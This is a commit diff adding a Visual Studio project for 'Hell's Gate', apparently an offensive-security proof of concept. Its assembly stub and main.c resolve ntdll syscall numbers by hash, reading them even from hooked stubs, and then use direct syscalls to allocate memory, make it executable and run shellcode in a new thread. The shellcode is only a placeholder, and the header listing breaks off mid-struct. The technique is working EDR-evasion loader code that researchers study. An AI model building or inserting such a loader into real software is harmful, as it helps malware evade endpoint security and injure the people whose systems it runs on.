Add files via upload

2026-06-15 07:19:24 +00:00 · 2020-10-11 00:53:07 -05:00
parent ad3ed5a13f
commit a6dbe47b59
24 changed files with 3744 additions and 0 deletions
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30114.105
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
+		{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,161 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
+    <RootNamespace>HellsGate</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="structs.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="hellsgate.asm">
+      <FileType>Document</FileType>
+    </MASM>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="structs.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="hellsgate.asm">
+      <Filter>Source Files</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,23 @@
+; Hell's Gate
+; Dynamic system call invocation 
+; 
+; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
+
+.data
+	wSystemCall DWORD 000h
+
+.code 
+	HellsGate PROC
+		mov wSystemCall, 000h
+		mov wSystemCall, ecx
+		ret
+	HellsGate ENDP
+
+	HellDescent PROC
+		mov r10, rcx
+		mov eax, wSystemCall
+
+		syscall
+		ret
+	HellDescent ENDP
+end
@@ -0,0 +1,211 @@
+#pragma once
+#include <Windows.h>
+#include "structs.h"
+
+/*--------------------------------------------------------------------
+  VX Tables
+--------------------------------------------------------------------*/
+typedef struct _VX_TABLE_ENTRY {
+	PVOID   pAddress;
+	DWORD64 dwHash;
+	WORD    wSystemCall;
+} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
+
+typedef struct _VX_TABLE {
+	VX_TABLE_ENTRY NtAllocateVirtualMemory;
+	VX_TABLE_ENTRY NtProtectVirtualMemory;
+	VX_TABLE_ENTRY NtCreateThreadEx;
+	VX_TABLE_ENTRY NtWaitForSingleObject;
+} VX_TABLE, * PVX_TABLE;
+
+/*--------------------------------------------------------------------
+  Function prototypes.
+--------------------------------------------------------------------*/
+PTEB RtlGetThreadEnvironmentBlock();
+BOOL GetImageExportDirectory(
+	_In_ PVOID                     pModuleBase,
+	_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
+);
+BOOL GetVxTableEntry(
+	_In_ PVOID pModuleBase,
+	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
+	_In_ PVX_TABLE_ENTRY pVxTableEntry
+);
+BOOL Payload(
+	_In_ PVX_TABLE pVxTable
+);
+PVOID VxMoveMemory(
+	_Inout_ PVOID dest,
+	_In_    const PVOID src,
+	_In_    SIZE_T len
+);
+
+/*--------------------------------------------------------------------
+  External functions' prototype.
+--------------------------------------------------------------------*/
+extern VOID HellsGate(WORD wSystemCall);
+extern HellDescent();
+
+INT wmain() {
+	PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
+	PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
+	if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
+		return 0x1;
+
+	// Get NTDLL module 
+	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+	// Get the EAT of NTDLL
+	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
+	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
+		return 0x01;
+
+	VX_TABLE Table = { 0 };
+	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
+	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
+		return 0x1;
+
+	Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
+	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
+		return 0x1;
+
+	Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
+	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
+		return 0x1;
+
+	Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
+	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
+		return 0x1;
+
+	Payload(&Table);
+	return 0x00;
+}
+
+PTEB RtlGetThreadEnvironmentBlock() {
+#if _WIN64
+	return (PTEB)__readgsqword(0x30);
+#else
+	return (PTEB)__readfsdword(0x16);
+#endif
+}
+
+DWORD64 djb2(PBYTE str) {
+	DWORD64 dwHash = 0x7734773477347734;
+	INT c;
+
+	while (c = *str++)
+		dwHash = ((dwHash << 0x5) + dwHash) + c;
+
+	return dwHash;
+}
+
+BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
+	// Get DOS header
+	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
+	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
+		return FALSE;
+	}
+
+	// Get NT headers
+	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
+	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
+		return FALSE;
+	}
+
+	// Get the EAT
+	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
+	return TRUE;
+}
+
+BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
+	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
+	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
+	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
+
+	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
+		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
+		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
+
+		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
+			pVxTableEntry->pAddress = pFunctionAddress;
+
+			// Quick and dirty fix in case the function has been hooked
+			WORD cw = 0;
+			while (TRUE) {
+				// check if syscall, in this case we are too far
+				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
+					return FALSE;
+
+				// check if ret, in this case we are also probaly too far
+				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
+					return FALSE;
+
+				// First opcodes should be :
+				//    MOV R10, RCX
+				//    MOV RCX, <syscall>
+				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
+					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
+					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
+					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
+					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
+					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
+					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
+					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
+					pVxTableEntry->wSystemCall = (high << 8) | low;
+					break;
+				}
+
+				cw++;
+			};
+		}
+	}
+
+	return TRUE;
+}
+
+BOOL Payload(PVX_TABLE pVxTable) {
+	NTSTATUS status = 0x00000000;
+	char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
+
+	// Allocate memory for the shellcode
+	PVOID lpAddress = NULL;
+	SIZE_T sDataSize = sizeof(shellcode);
+	HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
+	status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
+
+	// Write Memory
+	VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
+
+	// Change page permissions
+	ULONG ulOldProtect = 0;
+	HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
+	status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
+
+	// Create thread
+	HANDLE hHostThread = INVALID_HANDLE_VALUE;
+	HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
+	status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
+
+	// Wait for 1 seconds
+	LARGE_INTEGER Timeout;
+	Timeout.QuadPart = -10000000;
+	HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
+	status = HellDescent(hHostThread, FALSE, &Timeout);
+
+	return TRUE;
+}
+
+PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
+	char* d = dest;
+	const char* s = src;
+	if (d < s)
+		while (len--)
+			*d++ = *s++;
+	else {
+		char* lasts = s + (len - 1);
+		char* lastd = d + (len - 1);
+		while (len--)
+			*lastd-- = *lasts--;
+	}
+	return dest;
+}
@@ -0,0 +1,337 @@
+#pragma once
+#include <Windows.h>
+
+/*--------------------------------------------------------------------
+  STRUCTURES
+--------------------------------------------------------------------*/
+typedef struct _LSA_UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+	PVOID                   BaseAddress;
+	PVOID                   EntryPoint;
+	ULONG                   SizeOfImage;
+	UNICODE_STRING          FullDllName;
+	UNICODE_STRING          BaseDllName;
+	ULONG                   Flags;
+	SHORT                   LoadCount;
+	SHORT                   TlsIndex;
+	LIST_ENTRY              HashTableEntry;
+	ULONG                   TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+	ULONG                   Length;
+	ULONG                   Initialized;
+	PVOID                   SsHandle;
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+	BOOLEAN                 InheritedAddressSpace;
+	BOOLEAN                 ReadImageFileExecOptions;
+	BOOLEAN                 BeingDebugged;
+	BOOLEAN                 Spare;
+	HANDLE                  Mutant;
+	PVOID                   ImageBase;
+	PPEB_LDR_DATA           LoaderData;
+	PVOID                   ProcessParameters;
+	PVOID                   SubSystemData;
+	PVOID                   ProcessHeap;
+	PVOID                   FastPebLock;
+	PVOID                   FastPebLockRoutine;
+	PVOID                   FastPebUnlockRoutine;
+	ULONG                   EnvironmentUpdateCount;
+	PVOID* KernelCallbackTable;
+	PVOID                   EventLogSection;
+	PVOID                   EventLog;
+	PVOID                   FreeList;
+	ULONG                   TlsExpansionCounter;
+	PVOID                   TlsBitmap;
+	ULONG                   TlsBitmapBits[0x2];
+	PVOID                   ReadOnlySharedMemoryBase;
+	PVOID                   ReadOnlySharedMemoryHeap;
+	PVOID* ReadOnlyStaticServerData;
+	PVOID                   AnsiCodePageData;
+	PVOID                   OemCodePageData;
+	PVOID                   UnicodeCaseTableData;
+	ULONG                   NumberOfProcessors;
+	ULONG                   NtGlobalFlag;
+	BYTE                    Spare2[0x4];
+	LARGE_INTEGER           CriticalSectionTimeout;
+	ULONG                   HeapSegmentReserve;
+	ULONG                   HeapSegmentCommit;
+	ULONG                   HeapDeCommitTotalFreeThreshold;
+	ULONG                   HeapDeCommitFreeBlockThreshold;
+	ULONG                   NumberOfHeaps;
+	ULONG                   MaximumNumberOfHeaps;
+	PVOID** ProcessHeaps;
+	PVOID                   GdiSharedHandleTable;
+	PVOID                   ProcessStarterHelper;
+	PVOID                   GdiDCAttributeList;
+	PVOID                   LoaderLock;
+	ULONG                   OSMajorVersion;
+	ULONG                   OSMinorVersion;
+	ULONG                   OSBuildNumber;
+	ULONG                   OSPlatformId;
+	ULONG                   ImageSubSystem;
+	ULONG                   ImageSubSystemMajorVersion;
+	ULONG                   ImageSubSystemMinorVersion;
+	ULONG                   GdiHandleBuffer[0x22];
+	ULONG                   PostProcessInitRoutine;
+	ULONG                   TlsExpansionBitmap;
+	BYTE                    TlsExpansionBitmapBits[0x80];
+	ULONG                   SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+	ULONG Flags;
+	PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+	ULONG Flags;
+	struct _TEB_ACTIVE_FRAME* Previous;
+	PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+	ULONG Offset;
+	ULONG HDC;
+	ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+	struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+	PACTIVATION_CONTEXT ActivationContext;
+	ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+	PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+	LIST_ENTRY FrameListCache;
+	ULONG Flags;
+	ULONG NextCookieSequenceNumber;
+	ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+	NT_TIB				NtTib;
+	PVOID				EnvironmentPointer;
+	CLIENT_ID			ClientId;
+	PVOID				ActiveRpcHandle;
+	PVOID				ThreadLocalStoragePointer;
+	PPEB				ProcessEnvironmentBlock;
+	ULONG               LastErrorValue;
+	ULONG               CountOfOwnedCriticalSections;
+	PVOID				CsrClientThread;
+	PVOID				Win32ThreadInfo;
+	ULONG               User32Reserved[26];
+	ULONG               UserReserved[5];
+	PVOID				WOW32Reserved;
+	LCID                CurrentLocale;
+	ULONG               FpSoftwareStatusRegister;
+	PVOID				SystemReserved1[54];
+	LONG                ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+	ULONG                  TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+	ACTIVATION_CONTEXT_STACK ActivationContextStack;
+	UCHAR                  SpareBytes1[24];
+#endif
+	GDI_TEB_BATCH			GdiTebBatch;
+	CLIENT_ID				RealClientId;
+	PVOID					GdiCachedProcessHandle;
+	ULONG                   GdiClientPID;
+	ULONG                   GdiClientTID;
+	PVOID					GdiThreadLocalInfo;
+	PSIZE_T					Win32ClientInfo[62];
+	PVOID					glDispatchTable[233];
+	PSIZE_T					glReserved1[29];
+	PVOID					glReserved2;
+	PVOID					glSectionInfo;
+	PVOID					glSection;
+	PVOID					glTable;
+	PVOID					glCurrentRC;
+	PVOID					glContext;
+	NTSTATUS                LastStatusValue;
+	UNICODE_STRING			StaticUnicodeString;
+	WCHAR                   StaticUnicodeBuffer[261];
+	PVOID					DeallocationStack;
+	PVOID					TlsSlots[64];
+	LIST_ENTRY				TlsLinks;
+	PVOID					Vdm;
+	PVOID					ReservedForNtRpc;
+	PVOID					DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                   HardErrorMode;
+#else
+	ULONG                  HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID					Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+	GUID                    ActivityId;
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+	PVOID					EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID					Instrumentation[14];
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+#else
+	PVOID					Instrumentation[16];
+#endif
+	PVOID					WinSockData;
+	ULONG					GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	BOOLEAN                SpareBool0;
+	BOOLEAN                SpareBool1;
+	BOOLEAN                SpareBool2;
+#else
+	BOOLEAN                InDbgPrint;
+	BOOLEAN                FreeStackOnTermination;
+	BOOLEAN                HasFiberData;
+#endif
+	UCHAR                  IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                  GuaranteedStackBytes;
+#else
+	ULONG                  Spare3;
+#endif
+	PVOID				   ReservedForPerf;
+	PVOID				   ReservedForOle;
+	ULONG                  WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID				   SavedPriorityState;
+	ULONG_PTR			   SoftPatchPtr1;
+	ULONG_PTR			   ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG_PTR			   SparePointer1;
+	ULONG_PTR              SoftPatchPtr1;
+	ULONG_PTR              SoftPatchPtr2;
+#else
+	Wx86ThreadState        Wx86Thread;
+#endif
+	PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+	PVOID                  DeallocationBStore;
+	PVOID                  BStoreLimit;
+#endif
+	ULONG                  ImpersonationLocale;
+	ULONG                  IsImpersonating;
+	PVOID                  NlsCache;
+	PVOID                  pShimData;
+	ULONG                  HeapVirtualAffinity;
+	HANDLE                 CurrentTransactionHandle;
+	PTEB_ACTIVE_FRAME      ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID PreferredLangauges;
+	PVOID UserPrefLanguages;
+	PVOID MergedPrefLanguages;
+	ULONG MuiImpersonation;
+	union
+	{
+		struct
+		{
+			USHORT SpareCrossTebFlags : 16;
+		};
